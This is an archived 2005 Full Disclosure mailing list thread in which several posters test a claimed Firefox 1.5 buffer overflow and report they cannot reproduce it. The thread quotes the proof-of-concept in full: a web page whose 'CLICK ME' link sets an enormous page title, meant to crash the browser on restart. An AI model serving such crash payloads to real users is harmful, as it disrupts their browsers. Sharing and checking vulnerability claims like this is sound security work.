Full Disclosure mailing list archives
Re: re: Firefox 1.5 buffer overflow (poc)
From: Matt <paranoidgeek () gmail com>
Date: Fri, 9 Dec 2005 08:51:41 +1300
Didn't work here, just made the system go a bit sluggish for a moment, as you would expect when dealing with a 2.5 million character string. Firefox : Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051130 Firefox/1.5 Built with : gcc version 3.4.4 (Gentoo 3.4.4-r1, ssp-3.4.4-1.0, pie-8.7.8) Window manager: KDE 3.5.0 Possibly it is crashing the Windows API ? -- Matt On 12/9/05, Ron <iago () valhallalegends com> wrote:
I was also unable to replicate it, on Firefox 1.5 i386 Linux EN ad () heapoverflow com wrote:-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 nor a fake , nor you really dont know what is a buffer overflow, but for sure here on my firefox 1.5 EN, the client is much longuer to load to the next boot but it reloads fine without exceptions and there is nothing about a security bug here...<!-- Firefox 1.5 buffer overflow Basically firefox logs all kinda of URL data in it's history.dat file, this little script will set a really large topic and Firefox will then save that topic into it's history.dat.. The next time that firefox is opened, it will instantly crash due to a buffer overflow -- this will happen everytime until you manually delete the history.dat file --whichmost users won't figure out. this proof of concept will only prevent someone from reopening their browser after being exploited. DoS if you will. however, code execution is possible with some modifcations. Tested with Firefox 1.5 on Windows XP SP2. ZIPLOCK <sickbeatz () gmail com> --> <html><head><title>heh</title><script type="text/javascript"> function ex() { var buffer = ""; for (var i = 0; i < 5000; i++) { buffer += "A"; } var buffer2 = buffer; for (i = 0; i < 500; i++) { buffer2 += buffer; } document.title = buffer2; } </script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME </a></body></html>-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (MingW32) iQIVAwUBQ5g3Jq+LRXunxpxfAQIg5RAAsMXisNDN9AcLiWf9F7nsoKhT6uaULAw+ 4omnQUjuaRvxAIYRwKNC1nC+zl8qzmUsL4Extkd52mn7OkTrprd1MUE09CoshSlX Nq9N62bJ4zqRsdrum1NQhc358scTWNKCmWWXtSGNqu4fGnvpljyeYRACGeC6UD/v DDbikg09XOO+GffIAf4la63f+SV63+laZ6TkmX2jxBdw1LBN0mMCBLo0IPY5K78m /Cu2SCIqvs00ih6olLp9f8/3p9SgiK2+D9UiTnw3F3f2mYR5r7uGilYL9PNQPmKE crCnfKCYxi/4P03rnIuja9LNloQWkBTsOhOfe5716NlQ/KZAz/IpfTw7yS6sdn22 cxUpAE5zQqfI7jI0cD3yozmSksMyyEBLojAtsn2ECFOKpQQgkoOgaQX+dnrT+EYo pr2qquUKH/GXHGeT9od57cUkC/Jaf7qcaSkF6/LJ+13yHcsuDH0KcsMCYDP6aGN3 5R4/c6MAGFWKblMzdksWe+qqCDgm1yeM7MBbHGYyL6PMnfSldJBD29kGceLc47hi AVJaVmmDb3Nc/fo93gmqUT/x+mMItyk8+4dH0HOzEjRfI0qedeD+1uusS97ThVEw 2KG1o/1vlLPsnailmtHbj8sj/iawQvQRR/Phvk2Noz8bTQSEkDuThtE+zr2ZEjvb IFxjTMn8Sc0= =SX09 -----END PGP SIGNATURE-----
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- re: Firefox 1.5 buffer overflow (poc) ad () heapoverflow com (Dec 08)
- Re: re: Firefox 1.5 buffer overflow (poc) Ron (Dec 08)
- Re: re: Firefox 1.5 buffer overflow (poc) Matt (Dec 08)
- Re: Firefox 1.5 buffer overflow (poc) - more buffer "overflows" waiting to be discovered ezdy (Dec 08)
- Re: Firefox 1.5 buffer overflow (poc) - more buffer "overflows" waiting to be discovered Fósforo (Dec 09)
- Re: Firefox 1.5 buffer overflow (poc) - more buffer "overflows" waiting to be discovered Fósforo (Dec 09)
- Re: Firefox 1.5 buffer overflow (poc) - more buffer "overflows" waiting to be discovered Ron (Dec 09)
- Re: Firefox 1.5 buffer overflow (poc) - more buffer "overflows" waiting to be discovered ad () heapoverflow com (Dec 10)
- Re: re: Firefox 1.5 buffer overflow (poc) Matt (Dec 08)
- Re: re: Firefox 1.5 buffer overflow (poc) Ron (Dec 08)